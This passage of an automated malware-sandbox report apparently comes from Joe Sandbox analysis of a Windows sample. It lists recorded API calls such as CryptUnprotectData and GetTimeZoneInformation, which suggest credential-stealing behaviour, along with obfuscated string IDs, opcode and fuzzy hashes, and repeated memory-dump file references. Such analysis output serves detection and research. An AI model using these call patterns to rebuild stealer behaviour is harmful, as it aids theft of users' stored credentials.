                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FC7A6A
                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00DEDE48,00000000,?,00FD0E10,00000000,?,00000000,00000000,?), ref: 00FC7A7D
                              • wsprintfA.USER32 ref: 00FC7AB7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID:
                              • API String ID: 3317088062-0
                              • Opcode ID: 847390a7aaf17ea5a6bef17092cadc7def10044efae10b7620163568e96266b4
                              • Instruction ID: 1d26a461e3dad02a6200a9d6a5d330df98c7769959729deab5526af30c5972da
                              • Opcode Fuzzy Hash: 847390a7aaf17ea5a6bef17092cadc7def10044efae10b7620163568e96266b4
                              • Instruction Fuzzy Hash: 4F11CEB1905218EBEB209B54DD4AFA9B778FB40721F0003AAE91A932C0D7785E80CF51
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: '/w$8/U^$`&~o
                              • API String ID: 0-3578237245
                              • Opcode ID: f48ebf5990ab7d2c3ca27733ed6b1de0fc2d8f35634134b52c2bfb519e19c562
                              • Instruction ID: c0400d7b092660f0e5959f04849372eb035db8a1d2ee9800ef39bfab977ccc5b
                              • Opcode Fuzzy Hash: f48ebf5990ab7d2c3ca27733ed6b1de0fc2d8f35634134b52c2bfb519e19c562
                              • Instruction Fuzzy Hash: 0DB24AF3A0C2149FE3046E2DEC8567ABBE9EF94320F1A493DEAC4D7744E93558048697
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: IPW$n"{[$co
                              • API String ID: 0-2021754632
                              • Opcode ID: a90cf6ee601b705b5783da4630246348772737dc08a73d5a8151e9b0fd5470f5
                              • Instruction ID: bb6bb217ccea7c9fa653d6c5581c64939232e75d20e8448f30d76d28ba033870
                              • Opcode Fuzzy Hash: a90cf6ee601b705b5783da4630246348772737dc08a73d5a8151e9b0fd5470f5
                              • Instruction Fuzzy Hash: DBB227F360C2009FE308AE29DC9567AFBE9EF94320F16853DEAC5C7744EA3558018796
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: oj$%?{$m}
                              • API String ID: 0-2207495541
                              • Opcode ID: 8a59c3dae3f210606e7bd0afe4dee5086f5b9e1ae921c59cfd6f46bf5d589eff
                              • Instruction ID: f917f3113629ba1abb87c19c51506def9054ad3761e75d364c3eba963029b708
                              • Opcode Fuzzy Hash: 8a59c3dae3f210606e7bd0afe4dee5086f5b9e1ae921c59cfd6f46bf5d589eff
                              • Instruction Fuzzy Hash: E0B215F3A0C2049FE704AE2DDC8567ABBE5EF94320F1A493DEAC5C3744E63598118697
                              APIs
                              • CoCreateInstance.COMBASE(00FCE118,00000000,00000001,00FCE108,00000000), ref: 00FC3758
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00FC37B0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWide
                              • String ID:
                              • API String ID: 123533781-0
                              • Opcode ID: 3fee4f85101735891f15b6fe2eb5a50996a08631f0d8e4736030fc5681a33f2a
                              • Instruction ID: 13c2001ec7d0fb49eb898b13b22927a8e553bc26dbcc49ec22175522bb666751
                              • Opcode Fuzzy Hash: 3fee4f85101735891f15b6fe2eb5a50996a08631f0d8e4736030fc5681a33f2a
                              • Instruction Fuzzy Hash: F2410771A00A289FDB24DB58CC85F9BB7B4BB48302F4081D8E608A72D0D771AEC5CF50
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00FB9B84
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00FB9BA3
                              • LocalFree.KERNEL32(?), ref: 00FB9BD3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              • Opcode ID: 70724de9d9be9b42b2273efc95cc51bac89d6d126c342ea9aa103cb7f72ba91d
                              • Instruction ID: 669d051cdb161eaf0b57b177ff26e6f7fff5f0cf4a3428b7ae5e1e5d30f70f07
                              • Opcode Fuzzy Hash: 70724de9d9be9b42b2273efc95cc51bac89d6d126c342ea9aa103cb7f72ba91d
                              • Instruction Fuzzy Hash: 4511BAB8A00209DFCB04DFA4D985AAE77B5FF88300F1085A8E91597354D774AE50CF61
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: H%mk$nLY^
                              • API String ID: 0-3407211649
                              • Opcode ID: 75ec0b0bc14897c11e33591bb3ec0fbc393f664b2000c224298b402936838e64
                              • Instruction ID: e9e2af809dfdb718a398835e73bd200560c358d66cc44907b0fa4ea0dfc68184
                              • Opcode Fuzzy Hash: 75ec0b0bc14897c11e33591bb3ec0fbc393f664b2000c224298b402936838e64
                              • Instruction Fuzzy Hash: 18B2D1F3A0C2109FE304AE29DC8567EFBE5EF94720F16892DE6C487744EA3558418B97
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 1{O$E x$P|L)
                              • API String ID: 0-300466160
                              • Opcode ID: 5759536be890d015265aab73ae51b3ec1dbbbd1d5b0a358413a92f2f72167870
                              • Instruction ID: 684f657cedf7d457444e6337b1d4d7831707d2767814abc5b238e3115ec714b0
                              • Opcode Fuzzy Hash: 5759536be890d015265aab73ae51b3ec1dbbbd1d5b0a358413a92f2f72167870
                              • Instruction Fuzzy Hash: E16108F3E186144FE7106E2DEC85766BADAEBD4310F1A863DEAC887344E9395C058292
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: R3[Z
                              • API String ID: 0-3030155145
                              • Opcode ID: 5488d57a1df3fee258fe7d734b7c3dec54620fb25e0df943a6fb885262f00af4
                              • Instruction ID: 65a3c234d4a6b45b953eaf24adc0cb79b2f4ec02e94772e2849ea24fb0f44057
                              • Opcode Fuzzy Hash: 5488d57a1df3fee258fe7d734b7c3dec54620fb25e0df943a6fb885262f00af4
                              • Instruction Fuzzy Hash: E0720AF3A0C6009FE704AE2DEC8566AFBE5EF94720F16853DE6C4C7344EA3598058697
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: p[
                              • API String ID: 0-3533522376
                              • Opcode ID: 7b13a7b8695a44f78c25e1d5af9dcb0c1615113ea748b69172660c2e6cc30a40
                              • Instruction ID: e3c5dae4615444fc922bdc037e96a71d2f8f238154546f2216295a6b873b5068
                              • Opcode Fuzzy Hash: 7b13a7b8695a44f78c25e1d5af9dcb0c1615113ea748b69172660c2e6cc30a40
                              • Instruction Fuzzy Hash: 695169F3A041149FF3086A38DC5A77ABBDAE795320F17463DEA89D7BC4E9395C018285
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: #%o
                              • API String ID: 0-4121113136
                              • Opcode ID: 7b03818651e540b115db61428e679bff0886d6bc86025d617211b26901bc2de0
                              • Instruction ID: 7696415b28b0f6b4baafa120fe0a2e45710ff13c4998694ffac25ce337071314
                              • Opcode Fuzzy Hash: 7b03818651e540b115db61428e679bff0886d6bc86025d617211b26901bc2de0
                              • Instruction Fuzzy Hash: 1651F3B650C70DDFE709AE14DC8177AB7E8EB54B18F06492DD6D287B40EA3558408747
                              Memory Dump Source
                              • Source File: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: db0efcd2fec72845a4164a55d74dce1e2933db7855fd2e4470814ebfb4d2860b
                              • Instruction ID: 38b2b360d3c07ee024a49ea4833566f9c4f4767e75331271523c12e19aab019b
                              • Opcode Fuzzy Hash: db0efcd2fec72845a4164a55d74dce1e2933db7855fd2e4470814ebfb4d2860b
                              • Instruction Fuzzy Hash: F65139B3E082145BE7146E2DEC0976BBBD9DF94320F1A053EEA88D3744E9359C0587D6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
